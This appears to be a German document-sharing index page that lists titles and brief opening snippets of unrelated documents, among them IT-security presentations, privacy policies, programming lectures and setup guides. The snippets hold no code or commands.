Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?
Erste Hilfe «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Cache Einstellungen Im Internet Explorer von Microsoft wie auch in anderen Browsern (zum Beispiel Firefox) gibt
Inhalt. 1 Einleitung AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER
AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER Inhalt 1 Einleitung... 1 2 Einrichtung der Aufgabe für die automatische Sicherung... 2 2.1 Die Aufgabenplanung... 2 2.2 Der erste Testlauf... 9 3 Problembehebung...
SSL-Zertifikate. Dr. Christopher Kunz
SSL-Zertifikate Dr. Christopher Kunz Ihr Referent _ Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC 2012: SSL-Hacks _ OSDC
Datenschutzerklärung ENIGO
Datenschutzerklärung ENIGO Wir, die, nehmen den Schutz Ihrer persönlichen Daten sehr ernst und halten uns strikt an die Regeln der Datenschutzgesetze. Personenbezogene Daten werden auf dieser Website nur
Digitale Magazine ohne eigenen Speicher
Stefan Lucks Digitale Magazine ohne eigenen Speicher 1 Digitale Magazine ohne eigenen Speicher Wie man die Integrität fremdgespeicherter Archivalien sicherstellen kann Stefan Lucks Professur für Mediensicherheit
Die offizielle Homepage, Informationen, Entwicklergemeinde, etc. findet man unter www.eyeos.org
eyeos Kurzer Einblick Vor und Hinter die Kulissen von eyeos! by schuestel am 17.09.2008 @ LUG mteich Wer oder was ist eyeos? eyeos ist gedacht als Notebook Ersatz um überall auf seine Dateien zugreifen
itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com
itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 13.03.2013 Agenda Vorstellung Open Web Application Security Project (OWASP) Die OWASP Top 10 (2013 RC1) OWASP Top 3 in der
Kombinierte Attacke auf Mobile Geräte
Kombinierte Attacke auf Mobile Geräte 1 Was haben wir vorbereitet Man in the Middle Attacken gegen SmartPhone - Wie kommen Angreifer auf das Endgerät - Visualisierung der Attacke Via Exploit wird Malware
XML Signature Wrapping: Die Kunst SAML Assertions zu fälschen. 19. DFN Workshop Sicherheit in vernetzten Systemen Hamburg, 22.02.
XML Wrapping: Die Kunst SAML s zu fälschen Andreas Mayer Adolf Würth GmbH & Co. KG Künzelsau-Gaisbach Prof. Dr. Jörg Schwenk Lehrstuhl für Netz- und Datensicherheit Ruhr-Universität Bochum 19. DFN Workshop
Sicherheitstechnische Qualifizierung (SQ), Version 10.0 Security Assurance Level SEAL-3
Die Zertifizierungsstelle der TÜV Informationstechnik GmbH bescheinigt hiermit dem Unternehmen RWE Effizienz GmbH Flamingoweg 1 44139 Dortmund für das IT-System RWE eoperate IT Services die Erfüllung aller
Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011
Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich
Flashfragen in ILIAS Test & Assessment. Helmut Schottmüller
Flashfragen in ILIAS Test & Assessment Helmut Schottmüller Flashfragen in ILIAS Test & Assessment Helmut Schottmüller Veröffentlicht Januar 2009 Copyright 2009 Helmut Schottmüller Inhaltsverzeichnis 1.
Vorwort E-Mail ist heute für Unternehmen ein häufig eingesetztes Kommunikationsmittel, das zum Austausch von Informationen verwendet wird.
Vorwort E-Mail ist heute für Unternehmen ein häufig eingesetztes Kommunikationsmittel, das zum Austausch von Informationen verwendet wird. Auch die Unternehmensgruppe ALDI Nord steht mit einer Vielzahl
ASP.NET: ATLAS -Framework. Nico Orschel Microsoft Student Partner, TU Ilmenau nico.orschel@studentprogram.de
ASP.NET: ATLAS -Framework Nico Orschel Microsoft Student Partner, TU Ilmenau nico.orschel@studentprogram.de Agenda Einführung AJAX ATLAS Framework Architektur Microsoft AJAX Libary Microsoft ASP.NET 2.0
Java RMI, CORBA und Firewalls
Java RMI, CORBA und s Lehrstuhl für Datenverarbeitung falk@ei.tum.de Verteilte Objekte s Probleme Lösungsmöglichkeiten Konkrete Lösungen Verteilte Objekte Client mehrere Objekte Methoden-Aufruf Antwort
Newsletter SLA März 2015
Sollte dieser Newsletter nicht korrekt dargestellt werden, Klicken Sie bitte hier. Newsletter SLA März 2015 MEAT INTEGRITY SOLUTION (MIS) ALS NEUER STANDARD! Was leistet die MEAT INTEGRITY SOLUTION (MIS)?
MySQL Community Server 5.6 Installationsbeispiel (Ab 5.5.29)
MySQL Community Server 5.6 Installationsbeispiel (Ab 5.5.29) Dieses Dokument beschreibt das Herunterladen der Serversoftware, die Installation und Konfiguration der Software. Bevor mit der Migration der
The Second Generation Onion Router. Stefan Hasenauer, Christof Kauba, Stefan Mayer
The Second Generation Onion Router Übersicht Einleitung Verfahren zur Anonymisierung Allgemeines über Tor Funktionsweise von Tor Hidden Services Mögliche Angriffe 2 Einleitung Identifizierung im Internet
Sicherheit in Netzwerken. Leonard Claus, WS 2012 / 2013
Sicherheit in Netzwerken Leonard Claus, WS 2012 / 2013 Inhalt 1 Definition eines Sicherheitsbegriffs 2 Einführung in die Kryptografie 3 Netzwerksicherheit 3.1 E-Mail-Sicherheit 3.2 Sicherheit im Web 4
Multimediale Web-Anwendungen. JavaScript. Einführung. MWA JavaScript-Einführung Dr. E. Schön Sommersemester 2015 Folie 1.
Multimediale Web-Anwendungen JavaScript Einführung MWA JavaScript-Einführung Dr. E. Schön Sommersemester 2015 Folie 1 Entstehungsgeschichte: JavaScript 1995 Netscape Communications Corp. (Brendan Eich)
5.6 Vererbung. Vererbung
5.6 Vererbung Klassen können zueinander in einer "ist ein"- Beziehung stehen Beispiel: Jeder PKW ist ein Kraftfahrzeug, jedes Kraftfahrzeug ist ein Transportmittel aber: auch jeder LKW ist ein Kraftfahrzeug
Architektur des agimatec-validation Frameworks
Development : Implementierung Validierungskonzept (Dokumentation) This page last changed on Apr 03, 2008 by roman.stumm. Architektur des agimatec-validation Frameworks Generierung der Metainformationen
ezustellung in Microsoft Office
ezustellung in Microsoft Office Machbarkeit Fragestellungen Versand aus Word PlugIn für ebinterface Wie kann die ezustellung integriert werden Wie kann die Adressierung erfolgen Wie kann der Setup erfolgen
Security in.net 2.0. Thomas Stanek
Security in.net 2.0 2 Content 1. Verwendung 2. Überblick 3. Features im Detail a. Windows Accounts und SIDs b. Sichere Datenübertragung (SSL) c. X509 -Zertifikate d. Data Protection API (DPAPI) e. SecureStrings
Designänderungen mit CSS und jquery
Designänderungen mit CSS und jquery In der epages-administration gibt es in den Menüpunkten "Schnelldesign" und "Erweitertes Design" umfangreiche Möglichkeiten, das Design der Webseite anzupassen. Erfahrene
Soziale Netzwerke Basisschutz leicht gemacht. Tipps zur sicheren Nutzung von Facebook, Xing & Co
Soziale Netzwerke Basisschutz leicht gemacht Tipps zur sicheren Nutzung von Facebook, Xing & Co Sichere Nutzung sozialer Netzwerke Über soziale Netzwerke können Sie mit Freunden und Bekannten Kontakt aufnehmen,
Lokales Netzwerk Probleme beim Verbinden eines Linux-Clients mit einem Windows 2003 Server Frage:
Probleme beim Verbinden eines Linux-Clients mit einem Windows 2003 Server Frage: Ich möchte von einem Linux-Client aus, bzw. aus der Image-Software "Acronis TrueImage", auf Daten zugreifen, welche auf
Installationsanleitung für die h_da Zertifikate
Zentrale Serverdienste Installationsanleitung für die h_da Zertifikate Dokumentennummer: IT-ZSD-008 Version 1.3 Stand 23.05.2013 Historie Version Datum Änderung Autor 1.0 22.10.2008 Dokument angelegt tbo
Übung 1 mit C# 6.0 MATTHIAS RONCORONI
Übung 1 mit C# 6.0 MATTHIAS RONCORONI Inhalt 2 1. Überblick über C# 2. Lösung der Übung 1 3. Code 4. Demo C# allgemein 3 aktuell: C# 6.0 mit.net-framework 4.6: Multiparadigmatisch (Strukturiert, Objektorientiert,
Verteilte Systeme. 10.1 Unsicherheit in Verteilten Systemen
Verteilte Systeme Übung 10 Jens Müller-Iden Gruppe PVS (Parallele und Verteilte Systeme) Institut für Informatik Westfälische Wilhelms-Universität Münster Sommersemester 2007 10.1 Unsicherheit in Verteilten
Runde 2: Von der Statik zur Dynamik - Team Header
Es gibt eine neue Nachricht von Alice... Von: mail@alice-kleiner-shop.de An: topteam@schuelerlabor-informatik.de Betreff: Re:Anfrage bezüglich Erstellung eines Online-Shops Hallo, liebes Entwicklerteam!
Verteilte Systeme. Übung 10. Jens Müller-Iden
Verteilte Systeme Übung 10 Jens Müller-Iden Gruppe PVS (Parallele und Verteilte Systeme) Institut für Informatik Westfälische Wilhelms-Universität Münster Sommersemester 2007 10.1 Unsicherheit in Verteilten
Objektorientierte Programmierung
Objektorientierte Programmierung 1 Geschichte Dahl, Nygaard: Simula 67 (Algol 60 + Objektorientierung) Kay et al.: Smalltalk (erste rein-objektorientierte Sprache) Object Pascal, Objective C, C++ (wiederum
Kundenleitfaden zur Sicheren E-Mail per WebMail
Allgemeines Die E-Mail gehört heute für nahezu jeden von uns zu einem häufig verwendeten digitalen Kommunikationsmittel. Trotz des täglichen Gebrauchs tritt das Thema Sicherheit bei der Übermittlung von
JavaScript und das Document Object Model 30.05.07
JavaScript und das Document Object Model Dynamische Seiten Bestreben von Netscape und Microsoft, HTML-Seiten dynamisch zu gestalten Schlagwort DHTML Netscape/Sun: JavaScript Microsoft: JScript Problem
Web Services und Sicherheit
Autoren: Kristian Kottke, Christian Latus, Cristina Murgu, Ognyan Naydenov Folie 1 Agenda Sicherheitsprobleme von Web Services Lösungsansätze Sicherheitsmechanismen des Java Application Servers Autorisation
8: Zufallsorakel. Wir suchen: Einfache mathematische Abstraktion für Hashfunktionen
Stefan Lucks 8: Zufallsorakel 139 Kryptogr. Hashfunkt. (WS 08/09) 8: Zufallsorakel Unser Problem: Exakte Eigenschaften von effizienten Hashfunktionen nur schwer erfassbar (z.b. MD5, Tiger, RipeMD, SHA-1,...)
Anleitung zum Prüfen von WebDAV
Anleitung zum Prüfen von WebDAV (BDRS Version 8.010.006 oder höher) Dieses Merkblatt beschreibt, wie Sie Ihr System auf die Verwendung von WebDAV überprüfen können. 1. Was ist WebDAV? Bei der Nutzung des
Entwurfsbeschreibung
Entwurfsbeschreibung Web Annotation mit Fragment Ids Gruppe: swp12-9 Softwaretechnik-Praktikum 1 von 12 Inhaltsverzeichnis 1. Allgemeines...3 2. Umsetzungsmöglichkeiten...3 3. Produktübersicht...5 4. Grundsätzliche
Sicherheit von Webapplikationen Sichere Web-Anwendungen
Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt
Daten, die Sie uns geben (Geschäftsbeziehung, Anfragen, Nutzung eine unsere Dienstleistungen)
Datenschutzerklärung der Etacs GmbH Die Etacs GmbH wird den Anforderungen des Bundesdatenschutzgesetzes (BDSG) gerecht.personenbezogene Daten, d.h Angaben, mittels derer eine natürliche Person unmittelbar
ESecure Vault Die verschlüsselte CloudFESTplatte
Sie möchten von überall aus auf Ihre Daten zugreifen, aber niemand anderes soll Ihre Daten einsehen können? Mit dem Secure Vault von Evolution Hosting stellen wir Ihnen ein sicheres System vor. Sie müssen
SCHRITT FÜR SCHRITT ZU IHRER VERSCHLÜSSELTEN E-MAIL
SCHRITT FÜR SCHRITT ZU IHRER VERSCHLÜSSELTEN E-MAIL www.klinik-schindlbeck.de info@klinik-schindlbeck.de Bitte beachten Sie, dass wir nicht für die Sicherheit auf Ihrem Endgerät verantwortlich sein können.
Datenempfang von crossinx
Datenempfang von crossinx Datenempfang.doc Seite 1 von 6 Inhaltsverzeichnis 1 Einführung... 3 2 AS2... 3 3 SFTP... 3 4 FTP (via VPN)... 4 5 FTPS... 4 6 Email (ggf. verschlüsselt)... 5 7 Portalzugang über
Infrastruktur: Vertrauen herstellen, Zertifikate finden
TeleTrusT Bundesverband IT-Sicherheit e.v. Infrastruktur: Vertrauen herstellen, Zertifikate finden Allgemeines zur TeleTrusT EBCA Seit 2001 Zusammenschluss einzelner, gleichberechtigter n zu -Verbund einfacher,
Facebook iframe-tabs: individuelle Fanseiten-Reiter mit eigener Anwendung erstellen
Facebook iframe-tabs: individuelle Fanseiten-Reiter mit eigener Anwendung erstellen Anfang März 2011 hat Facebook das Erstellen von sogenannten iframe-tabs als individuelle Gestaltungsmöglichkeit von Fanseiten
TeleBuilder for Process Data
TeleBuilder for Process Data Komponenten für die Lean Web Automation - Benutzeranleitung Version: 1.0 / 15.11.005 Autoren: Dipl.-Ing. S. Karasik Prof. Dr.-Ing. R. Langmann 1. Allgemeine Information Der
estos XMPP Proxy 5.1.30.33611
estos XMPP Proxy 5.1.30.33611 1 Willkommen zum estos XMPP Proxy... 4 1.1 WAN Einstellungen... 4 1.2 LAN Einstellungen... 5 1.3 Konfiguration des Zertifikats... 6 1.4 Diagnose... 6 1.5 Proxy Dienst... 7
Phishing und Pharming - Abwehrmaßnahmen gegen Datendiebstahl im Internet
Phishing und Pharming - Abwehrmaßnahmen gegen Datendiebstahl im Internet Beispiel für eine gefälschte Ebay-Mail Unterschiede zu einer echten Ebay-Mail sind nicht zu erkennen. Quelle: www.fraudwatchinternational.com